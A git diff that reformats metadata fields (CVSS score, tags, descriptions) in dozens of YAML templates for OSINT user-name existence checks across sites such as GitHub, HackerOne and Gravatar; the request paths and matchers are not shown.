fortnite-tracker info: name: Fortnite Tracker User Name Information - Detect author: dwisiswant0 - description: Fortnite Tracker user name information check was conducted. severity: info + description: Fortnite Tracker user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,fortnite-tracker metadata: max-request: 1 + tags: osint,osint-gaming,fortnite-tracker self-contained: true + http: - method: GET path: diff --git a/http/osint/forumprawneorg.yaml b/http/osint/forumprawneorg.yaml index bfb4367aeb..bbd2b1bacc 100644 --- a/http/osint/forumprawneorg.yaml +++ b/http/osint/forumprawneorg.yaml @@ -3,17 +3,18 @@ id: forumprawneorg info: name: Forumprawne.org User Name Information - Detect author: dwisiswant0 - description: Forumprawne.org user name information check was conducted. severity: info + description: Forumprawne.org user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,forumprawneorg metadata: max-request: 1 + tags: osint,osint-misc,forumprawneorg self-contained: true + http: - method: GET path: diff --git a/http/osint/fosstodonorg-mastodon-instance.yaml b/http/osint/fosstodonorg-mastodon-instance.yaml index ae2106ba46..6d697239d1 100644 --- a/http/osint/fosstodonorg-mastodon-instance.yaml +++ b/http/osint/fosstodonorg-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: fosstodonorg-mastodon-instance info: name: Fosstodon.org (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Fosstodon.org (Mastodon Instance) user name information check was conducted. severity: info + description: Fosstodon.org (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,fosstodonorg-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,fosstodonorg-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/fotka.yaml b/http/osint/fotka.yaml index 52821d8ccf..018a7246a8 100644 --- a/http/osint/fotka.yaml +++ b/http/osint/fotka.yaml @@ -3,17 +3,18 @@ id: fotka info: name: Fotka User Name Information - Detect author: dwisiswant0 - description: Fotka user name information check was conducted. severity: info + description: Fotka user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,fotka metadata: max-request: 1 + tags: osint,osint-social,fotka self-contained: true + http: - method: GET path: diff --git a/http/osint/foursquare.yaml b/http/osint/foursquare.yaml index e0148dd4c8..1b8e7b4634 100644 --- a/http/osint/foursquare.yaml +++ b/http/osint/foursquare.yaml @@ -3,17 +3,18 @@ id: foursquare info: name: Foursquare User Name Information - Detect author: dwisiswant0 - description: Foursquare user name information check was conducted. severity: info + description: Foursquare user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,foursquare metadata: max-request: 1 + tags: osint,osint-social,foursquare self-contained: true + http: - method: GET path: diff --git a/http/osint/freelancer.yaml b/http/osint/freelancer.yaml index 9c26398ef8..28fed483ae 100644 --- a/http/osint/freelancer.yaml +++ b/http/osint/freelancer.yaml @@ -3,17 +3,18 @@ id: freelancer info: name: Freelancer User Name Information - Detect author: dwisiswant0 - description: Freelancer user name information check was conducted. severity: info + description: Freelancer user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,freelancer metadata: max-request: 1 + tags: osint,osint-business,freelancer self-contained: true + http: - method: GET path: diff --git a/http/osint/freesound.yaml b/http/osint/freesound.yaml index abb9eeff2d..6e0157c617 100644 --- a/http/osint/freesound.yaml +++ b/http/osint/freesound.yaml @@ -3,17 +3,18 @@ id: freesound info: name: Freesound User Name Information - Detect author: dwisiswant0 - description: Freesound user name information check was conducted. severity: info + description: Freesound user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,freesound metadata: max-request: 1 + tags: osint,osint-music,freesound self-contained: true + http: - method: GET path: diff --git a/http/osint/friendfinder-x.yaml b/http/osint/friendfinder-x.yaml index 3214914921..e79f1edb6c 100644 --- a/http/osint/friendfinder-x.yaml +++ b/http/osint/friendfinder-x.yaml @@ -3,17 +3,18 @@ id: friendfinder-x info: name: FriendFinder-X User Name Information - Detect author: dwisiswant0 - description: FriendFinder-X user name information check was conducted. severity: info + description: FriendFinder-X user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,friendfinder-x metadata: max-request: 1 + tags: osint,osint-dating,friendfinder-x self-contained: true + http: - method: GET path: diff --git a/http/osint/friendfinder.yaml b/http/osint/friendfinder.yaml index edc5c51bc5..7d469db4ba 100644 --- a/http/osint/friendfinder.yaml +++ b/http/osint/friendfinder.yaml @@ -3,17 +3,18 @@ id: friendfinder info: name: FriendFinder User Name Information - Detect author: dwisiswant0 - description: FriendFinder user name information check was conducted. severity: info + description: FriendFinder user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,friendfinder metadata: max-request: 1 + tags: osint,osint-dating,friendfinder self-contained: true + http: - method: GET path: diff --git a/http/osint/friendweb.yaml b/http/osint/friendweb.yaml index 1fcfbe8ba2..08c0a2641a 100644 --- a/http/osint/friendweb.yaml +++ b/http/osint/friendweb.yaml @@ -3,17 +3,18 @@ id: friendweb info: name: Friendweb User Name Information - Detect author: dwisiswant0 - description: Friendweb user name information check was conducted. severity: info + description: Friendweb user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,friendweb metadata: max-request: 1 + tags: osint,osint-social,friendweb self-contained: true + http: - method: GET path: diff --git a/http/osint/furiffic.yaml b/http/osint/furiffic.yaml index 594593f676..27cf634a49 100644 --- a/http/osint/furiffic.yaml +++ b/http/osint/furiffic.yaml @@ -3,17 +3,18 @@ id: furiffic info: name: Furiffic User Name Information - Detect author: dwisiswant0 - description: Furiffic user name information check was conducted. severity: info + description: Furiffic user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,furiffic metadata: max-request: 1 + tags: osint,osint-porn,furiffic self-contained: true + http: - method: GET path: diff --git a/http/osint/gab.yaml b/http/osint/gab.yaml index 4dba3ac896..a9f6d81cd3 100644 --- a/http/osint/gab.yaml +++ b/http/osint/gab.yaml @@ -3,17 +3,18 @@ id: gab info: name: Gab User Name Information - Detect author: dwisiswant0 - description: Gab user name information check was conducted. severity: info + description: Gab user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,gab metadata: max-request: 1 + tags: osint,osint-political,gab self-contained: true + http: - method: GET path: diff --git a/http/osint/game-debate.yaml b/http/osint/game-debate.yaml index 4fd47dd3de..0a2e1ddaf9 100644 --- a/http/osint/game-debate.yaml +++ b/http/osint/game-debate.yaml @@ -3,17 +3,18 @@ id: game-debate info: name: Game debate User Name Information - Detect author: dwisiswant0 - description: Game debate user name information check was conducted. severity: info + description: Game debate user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,game-debate metadata: max-request: 1 + tags: osint,osint-gaming,game-debate self-contained: true + http: - method: GET path: diff --git a/http/osint/gamespot.yaml b/http/osint/gamespot.yaml index c65d0444c8..1f7415710b 100644 --- a/http/osint/gamespot.yaml +++ b/http/osint/gamespot.yaml @@ -3,17 +3,18 @@ id: gamespot info: name: Gamespot User Name Information - Detect author: dwisiswant0 - description: Gamespot user name information check was conducted. severity: info + description: Gamespot user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,gamespot metadata: max-request: 1 + tags: osint,osint-gaming,gamespot self-contained: true + http: - method: GET path: diff --git a/http/osint/garmin-connect.yaml b/http/osint/garmin-connect.yaml index 610ea131a5..240f5957fb 100644 --- a/http/osint/garmin-connect.yaml +++ b/http/osint/garmin-connect.yaml @@ -3,17 +3,18 @@ id: garmin-connect info: name: Garmin connect User Name Information - Detect author: dwisiswant0 - description: Garmin connect user name information check was conducted. severity: info + description: Garmin connect user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,garmin-connect metadata: max-request: 1 + tags: osint,osint-health,garmin-connect self-contained: true + http: - method: GET path: diff --git a/http/osint/geocaching.yaml b/http/osint/geocaching.yaml index 71b5c99c1d..c921817fbc 100644 --- a/http/osint/geocaching.yaml +++ b/http/osint/geocaching.yaml @@ -3,17 +3,18 @@ id: geocaching info: name: Geocaching User Name Information - Detect author: dwisiswant0 - description: Geocaching user name information check was conducted. severity: info + description: Geocaching user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,geocaching metadata: max-request: 1 + tags: osint,osint-social,geocaching self-contained: true + http: - method: GET path: diff --git a/http/osint/getmonero.yaml b/http/osint/getmonero.yaml index f19813b27e..167ed8f02a 100644 --- a/http/osint/getmonero.yaml +++ b/http/osint/getmonero.yaml @@ -3,17 +3,18 @@ id: getmonero info: name: Getmonero User Name Information - Detect author: dwisiswant0 - description: Getmonero user name information check was conducted. severity: info + description: Getmonero user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,getmonero metadata: max-request: 1 + tags: osint,osint-misc,getmonero self-contained: true + http: - method: GET path: diff --git a/http/osint/gettr.yaml b/http/osint/gettr.yaml index 1604705e62..0d045e831f 100644 --- a/http/osint/gettr.yaml +++ b/http/osint/gettr.yaml @@ -3,17 +3,18 @@ id: gettr info: name: Gettr User Name Information - Detect author: dwisiswant0 - description: Gettr user name information check was conducted. severity: info + description: Gettr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,gettr metadata: max-request: 1 + tags: osint,osint-social,gettr self-contained: true + http: - method: GET path: diff --git a/http/osint/gfycat.yaml b/http/osint/gfycat.yaml index 820909321a..b3a3870c81 100644 --- a/http/osint/gfycat.yaml +++ b/http/osint/gfycat.yaml @@ -3,17 +3,18 @@ id: gfycat info: name: Gfycat User Name Information - Detect author: dwisiswant0 - description: Gfycat user name information check was conducted. severity: info + description: Gfycat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,gfycat metadata: max-request: 1 + tags: osint,osint-misc,gfycat self-contained: true + http: - method: GET path: diff --git a/http/osint/gigapan.yaml b/http/osint/gigapan.yaml index a57ed71d3e..24c6e620d6 100644 --- a/http/osint/gigapan.yaml +++ b/http/osint/gigapan.yaml @@ -3,17 +3,18 @@ id: gigapan info: name: Gigapan User Name Information - Detect author: dwisiswant0 - description: Gigapan user name information check was conducted. severity: info + description: Gigapan user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,gigapan metadata: max-request: 1 + tags: osint,osint-hobby,gigapan self-contained: true + http: - method: GET path: diff --git a/http/osint/giphy.yaml b/http/osint/giphy.yaml index 81c3c1c427..37610abd74 100644 --- a/http/osint/giphy.yaml +++ b/http/osint/giphy.yaml @@ -3,17 +3,18 @@ id: giphy info: name: Giphy User Name Information - Detect author: dwisiswant0 - description: Giphy user name information check was conducted. severity: info + description: Giphy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,giphy metadata: max-request: 1 + tags: osint,osint-social,giphy self-contained: true + http: - method: GET path: diff --git a/http/osint/girlfriendsmeet.yaml b/http/osint/girlfriendsmeet.yaml index 199aa3afcb..c845fce872 100644 --- a/http/osint/girlfriendsmeet.yaml +++ b/http/osint/girlfriendsmeet.yaml @@ -3,17 +3,18 @@ id: girlfriendsmeet info: name: Girlfriendsmeet User Name Information - Detect author: dwisiswant0 - description: Girlfriendsmeet user name information check was conducted. severity: info + description: Girlfriendsmeet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,girlfriendsmeet metadata: max-request: 1 + tags: osint,osint-dating,girlfriendsmeet self-contained: true + http: - method: GET path: diff --git a/http/osint/gist.yaml b/http/osint/gist.yaml index 9b20ddea10..aedda9c6b9 100644 --- a/http/osint/gist.yaml +++ b/http/osint/gist.yaml @@ -3,19 +3,19 @@ id: gist info: name: Gist User Name Information - Detect author: philippedelteil - description: Gist user name information check was conducted. severity: info + description: Gist user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: osint,osint-coding,gist,github - self-contained: true + http: - method: GET path: diff --git a/http/osint/gitea.yaml b/http/osint/gitea.yaml index f8ad05737a..4468cb5a2f 100644 --- a/http/osint/gitea.yaml +++ b/http/osint/gitea.yaml @@ -3,17 +3,18 @@ id: gitea info: name: Gitea User Name Information - Detect author: dwisiswant0 - description: Gitea user name information check was conducted. severity: info + description: Gitea user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,gitea metadata: max-request: 1 + tags: osint,osint-coding,gitea self-contained: true + http: - method: GET path: diff --git a/http/osint/gitee.yaml b/http/osint/gitee.yaml index 997c3137ea..520ef5b448 100644 --- a/http/osint/gitee.yaml +++ b/http/osint/gitee.yaml @@ -3,17 +3,18 @@ id: gitee info: name: Gitee User Name Information - Detect author: dwisiswant0 - description: Gitee user name information check was conducted. severity: info + description: Gitee user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,gitee metadata: max-request: 1 + tags: osint,osint-coding,gitee self-contained: true + http: - method: GET path: diff --git a/http/osint/giters.yaml b/http/osint/giters.yaml index 93db5c8ba5..d973773575 100644 --- a/http/osint/giters.yaml +++ b/http/osint/giters.yaml @@ -3,17 +3,18 @@ id: giters info: name: Giters User Name Information - Detect author: dwisiswant0 - description: Giters user name information check was conducted. severity: info + description: Giters user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,giters metadata: max-request: 1 + tags: osint,osint-coding,giters self-contained: true + http: - method: GET path: diff --git a/http/osint/github.yaml b/http/osint/github.yaml index 4454521c72..185ce626cf 100644 --- a/http/osint/github.yaml +++ b/http/osint/github.yaml @@ -3,17 +3,18 @@ id: github info: name: GitHub User Name Information - Detect author: dwisiswant0 - description: GitHub user name information check was conducted. severity: info + description: GitHub user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,github metadata: max-request: 1 + tags: osint,osint-coding,github self-contained: true + http: - method: GET path: diff --git a/http/osint/gitlab.yaml b/http/osint/gitlab.yaml index 94988329bb..3cbefc37f8 100644 --- a/http/osint/gitlab.yaml +++ b/http/osint/gitlab.yaml @@ -3,17 +3,18 @@ id: gitlab info: name: GitLab User Name Information - Detect author: dwisiswant0 - description: GitLab user name information check was conducted. severity: info + description: GitLab user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,gitlab metadata: max-request: 1 + tags: osint,osint-coding,gitlab self-contained: true + http: - method: GET path: diff --git a/http/osint/gloriatv.yaml b/http/osint/gloriatv.yaml index c6d10f9e73..572e2a1c0c 100644 --- a/http/osint/gloriatv.yaml +++ b/http/osint/gloriatv.yaml @@ -3,17 +3,18 @@ id: gloriatv info: name: Gloria.tv User Name Information - Detect author: dwisiswant0 - description: Gloria.tv user name information check was conducted. severity: info + description: Gloria.tv user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,gloriatv metadata: max-request: 1 + tags: osint,osint-social,gloriatv self-contained: true + http: - method: GET path: diff --git a/http/osint/gnome-extensions.yaml b/http/osint/gnome-extensions.yaml index 34f3ef21bc..1765f0c178 100644 --- a/http/osint/gnome-extensions.yaml +++ b/http/osint/gnome-extensions.yaml @@ -3,17 +3,18 @@ id: gnome-extensions info: name: Gnome extensions User Name Information - Detect author: dwisiswant0 - description: Gnome extensions user name information check was conducted. severity: info + description: Gnome extensions user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,gnome-extensions metadata: max-request: 1 + tags: osint,osint-coding,gnome-extensions self-contained: true + http: - method: GET path: diff --git a/http/osint/gpoddernet.yaml b/http/osint/gpoddernet.yaml index 9e77ef9121..a87208e1cb 100644 --- a/http/osint/gpoddernet.yaml +++ b/http/osint/gpoddernet.yaml @@ -3,17 +3,18 @@ id: gpoddernet info: name: Gpodder.net User Name Information - Detect author: dwisiswant0 - description: Gpodder.net user name information check was conducted. severity: info + description: Gpodder.net user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,gpoddernet metadata: max-request: 1 + tags: osint,osint-music,gpoddernet self-contained: true + http: - method: GET path: diff --git a/http/osint/grandprof.yaml b/http/osint/grandprof.yaml index 0e94245745..71c5c5873d 100644 --- a/http/osint/grandprof.yaml +++ b/http/osint/grandprof.yaml @@ -3,17 +3,18 @@ id: grandprof info: name: Grandprof User Name Information - Detect author: dwisiswant0 - description: Grandprof user name information check was conducted. severity: info + description: Grandprof user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,grandprof metadata: max-request: 1 + tags: osint,osint-misc,grandprof self-contained: true + http: - method: GET path: diff --git a/http/osint/graphicssocial-mastodon-instance.yaml b/http/osint/graphicssocial-mastodon-instance.yaml index 2bd2fc29bd..4608e4d047 100644 --- a/http/osint/graphicssocial-mastodon-instance.yaml +++ b/http/osint/graphicssocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: graphicssocial-mastodon-instance info: name: Graphics.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Graphics.social (Mastodon Instance) user name information check was conducted. severity: info + description: Graphics.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,graphicssocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,graphicssocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/gravatar.yaml b/http/osint/gravatar.yaml index 33e12dad26..ca90a85836 100644 --- a/http/osint/gravatar.yaml +++ b/http/osint/gravatar.yaml @@ -3,17 +3,18 @@ id: gravatar info: name: Gravatar User Name Information - Detect author: dwisiswant0 - description: Gravatar user name information check was conducted. severity: info + description: Gravatar user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,gravatar metadata: max-request: 1 + tags: osint,osint-images,gravatar self-contained: true + http: - method: GET path: diff --git a/http/osint/gumroad.yaml b/http/osint/gumroad.yaml index 3894fda97f..5e66b89780 100644 --- a/http/osint/gumroad.yaml +++ b/http/osint/gumroad.yaml @@ -3,17 +3,18 @@ id: gumroad info: name: Gumroad User Name Information - Detect author: dwisiswant0 - description: Gumroad user name information check was conducted. severity: info + description: Gumroad user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,gumroad metadata: max-request: 1 + tags: osint,osint-shopping,gumroad self-contained: true + http: - method: GET path: diff --git a/http/osint/hackaday.yaml b/http/osint/hackaday.yaml index ff31273d1c..8af6cbdd3c 100644 --- a/http/osint/hackaday.yaml +++ b/http/osint/hackaday.yaml @@ -3,17 +3,18 @@ id: hackaday info: name: Hackaday User Name Information - Detect author: dwisiswant0 - description: Hackaday user name information check was conducted. severity: info + description: Hackaday user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,hackaday metadata: max-request: 1 + tags: osint,osint-hobby,hackaday self-contained: true + http: - method: GET path: diff --git a/http/osint/hackenproof.yaml b/http/osint/hackenproof.yaml index fd2e859428..ec166f4bcf 100644 --- a/http/osint/hackenproof.yaml +++ b/http/osint/hackenproof.yaml @@ -7,13 +7,14 @@ info: description: Hackenproof user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 tags: osint,osint-tech,hackenproof self-contained: true + http: - method: GET path: diff --git a/http/osint/hacker-news.yaml b/http/osint/hacker-news.yaml index ceab403702..88a71348e8 100644 --- a/http/osint/hacker-news.yaml +++ b/http/osint/hacker-news.yaml @@ -3,17 +3,18 @@ id: hacker-news info: name: Hacker News User Name Information - Detect author: dwisiswant0 - description: Hacker News user name information check was conducted. severity: info + description: Hacker News user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,hacker-news metadata: max-request: 1 + tags: osint,osint-tech,hacker-news self-contained: true + http: - method: GET path: diff --git a/http/osint/hackerearth.yaml b/http/osint/hackerearth.yaml index c8631f2ce9..48cba920f9 100644 --- a/http/osint/hackerearth.yaml +++ b/http/osint/hackerearth.yaml @@ -3,17 +3,18 @@ id: hackerearth info: name: Hackerearth User Name Information - Detect author: dwisiswant0 - description: Hackerearth user name information check was conducted. severity: info + description: Hackerearth user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,hackerearth metadata: max-request: 1 + tags: osint,osint-coding,hackerearth self-contained: true + http: - method: GET path: diff --git a/http/osint/hackernoon.yaml b/http/osint/hackernoon.yaml index e689d99d00..409be05c88 100644 --- a/http/osint/hackernoon.yaml +++ b/http/osint/hackernoon.yaml @@ -3,17 +3,18 @@ id: hackernoon info: name: Hackernoon User Name Information - Detect author: dwisiswant0 - description: Hackernoon user name information check was conducted. severity: info + description: Hackernoon user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,hackernoon metadata: max-request: 1 + tags: osint,osint-tech,hackernoon self-contained: true + http: - method: GET path: diff --git a/http/osint/hackerone.yaml b/http/osint/hackerone.yaml index 457e659216..42339a6f2a 100644 --- a/http/osint/hackerone.yaml +++ b/http/osint/hackerone.yaml @@ -3,17 +3,18 @@ id: hackerone info: name: HackerOne User Name Information - Detect author: dwisiswant0 - description: HackerOne user name information check was conducted. severity: info + description: HackerOne user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,hackerone metadata: max-request: 1 + tags: osint,osint-tech,hackerone self-contained: true + http: - method: GET path: diff --git a/http/osint/hackerrank.yaml b/http/osint/hackerrank.yaml index a16dc70fde..5c1343daaa 100644 --- a/http/osint/hackerrank.yaml +++ b/http/osint/hackerrank.yaml @@ -3,17 +3,18 @@ id: hackerrank info: name: HackerRank User Name Information - Detect author: dwisiswant0 - description: HackerRank user name information check was conducted. severity: info + description: HackerRank user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,hackerrank metadata: max-request: 1 + tags: osint,osint-tech,hackerrank self-contained: true + http: - method: GET path: diff --git a/http/osint/hackster.yaml b/http/osint/hackster.yaml index 2c44504ea3..45c6e0c3b1 100644 --- a/http/osint/hackster.yaml +++ b/http/osint/hackster.yaml @@ -3,17 +3,18 @@ id: hackster info: name: Hackster User Name Information - Detect author: dwisiswant0 - description: Hackster user name information check was conducted. severity: info + description: Hackster user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,hackster metadata: max-request: 1 + tags: osint,osint-coding,hackster self-contained: true + http: - method: GET path: diff --git a/http/osint/hamaha.yaml b/http/osint/hamaha.yaml index 98c2c269a3..d9e20d750d 100644 --- a/http/osint/hamaha.yaml +++ b/http/osint/hamaha.yaml @@ -3,17 +3,18 @@ id: hamaha info: name: Hamaha User Name Information - Detect author: dwisiswant0 - description: Hamaha user name information check was conducted. severity: info + description: Hamaha user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,hamaha metadata: max-request: 1 + tags: osint,osint-finance,hamaha self-contained: true + http: - method: GET path: diff --git a/http/osint/hanime.yaml b/http/osint/hanime.yaml index 4223d12bce..e20422ffc5 100644 --- a/http/osint/hanime.yaml +++ b/http/osint/hanime.yaml @@ -3,17 +3,18 @@ id: hanime info: name: Hanime User Name Information - Detect author: dwisiswant0 - description: Hanime user name information check was conducted. severity: info + description: Hanime user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,hanime metadata: max-request: 1 + tags: osint,osint-porn,hanime self-contained: true + http: - method: GET path: diff --git a/http/osint/hashnode.yaml b/http/osint/hashnode.yaml index 15c6c14ce8..985acff18e 100644 --- a/http/osint/hashnode.yaml +++ b/http/osint/hashnode.yaml @@ -7,13 +7,14 @@ info: description: hashnode.com user name information check was conducted. classification: cvss-metrics: 